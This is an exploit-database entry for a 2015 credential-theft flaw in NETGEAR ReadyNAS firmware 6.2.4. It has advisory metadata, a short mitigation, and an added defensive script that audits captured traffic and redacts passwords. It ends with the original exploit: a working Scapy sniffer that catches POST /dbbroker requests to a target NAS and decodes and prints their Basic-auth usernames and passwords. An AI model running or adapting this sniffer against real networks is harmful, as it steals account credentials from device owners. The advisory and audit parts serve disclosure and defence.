vendor: ReadyNAS LAN
by: St0rn
CVSS: 7.5 HIGH
Credential Stealing
CWE: 522
Product Name: ReadyNAS LAN
Affected Version From: Firmware 6.2.4
Affected Version To: Firmware 6.2.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

NETGEAR ReadyNAS LAN /dbbroker Credential Stealing

NETGEAR ReadyNAS LAN /dbbroker Credential Stealing is a vulnerability that allows an attacker to steal credentials from a NETGEAR ReadyNAS LAN device. The exploit uses Scapy to sniff network traffic and extract the credentials from the POST request sent to /dbbroker: it reads the Authorization: Basic header of that request, decodes the value from Base64, and prints it to the screen.

Mitigation:

Users should ensure that their NETGEAR ReadyNAS LAN devices are running the latest firmware version and that all security patches are applied.
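
To confirm whether management traffic to a device still exposes the request described above, a defender can audit reassembled cleartext HTTP requests from an authorised capture. The following is an added example, not part of the original advisory or the exploit; the names audit_request and audit_capture and the sample request are constructed for illustration. It reports the exposed account and never keeps the password.

```python
import base64
import binascii
from typing import List, Optional

# Constructed sample: a cleartext request of the shape the advisory describes.
SAMPLE = (
    b"POST /dbbroker HTTP/1.1\r\n"
    b"Host: nas.example\r\n"
    b"Authorization: Basic " + base64.b64encode(b"admin:constructed-pw") + b"\r\n"
    b"Content-Length: 0\r\n\r\n"
)


def audit_request(raw: bytes) -> Optional[dict]:
    """Flag a cleartext POST /dbbroker that carries HTTP Basic credentials."""
    lines = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or parts[0] != "POST":
        return None
    path = parts[1].split("?", 1)[0]
    if path != "/dbbroker":
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    scheme, _, token = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None  # not a well-formed Basic credential
    user, sep, _secret = decoded.partition(b":")
    # Report which account is exposed; the password is never stored or printed.
    return {"path": path, "account": user.decode("latin-1") if sep else None,
            "password": "<redacted>", "finding": "Basic credentials sent in cleartext"}


def audit_capture(requests: List[bytes]) -> List[dict]:
    """Audit reassembled cleartext HTTP requests from an authorised capture."""
    return [f for f in map(audit_request, requests) if f is not None]


if __name__ == "__main__":
    for finding in audit_capture([SAMPLE]):
        print(finding)
```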

Exploit-DB raw data:

#!/usr/bin/env python
#
# Exploit Title: NETGEAR ReadyNAS LAN /dbbroker Credential Stealing
# Date: 25/07/2015
# Exploit Author: St0rn
# Vendor Homepage: www.netgear.fr/business/products/storage/readynas
# Software Link: apps.readynas.com/pages/?page_id=143
# Version: Firmware 6.2.4
#

### Import ###
from scapy.all import *
from sys import argv,exit
from os import system

### Clear Function ###
def clear():
    system("/usr/bin/clear")


### Function to get and decode credential ###
def getReadyNASCredz(p):
    if p.haslayer(TCP) and p[IP].dst==argv[2]:
        if p.haslayer(Raw):
            if "POST /dbbroker" in p[Raw].load:
                tmp=p[Raw].load
                credz=tmp.split("\r\n")
                for i in credz:
                    if "Authorization: Basic" in i:
                        print "-----------------".center(80)
                        print i.split(" ")[2].decode("base64").center(80)


### Main ###
if __name__ == '__main__':

    clear()
    if len(argv)<3:
        print "Usage: %s [device] [NAS_IP]" %(argv[0])
        exit(0)
    else:
        print "\n"
        print "#################".center(80)
        print "#G0 t0 G3t Cr3dZ#".center(80)
        print "#################\n".center(80)

        sniff(prn=getReadyNASCredz,iface=argv[1])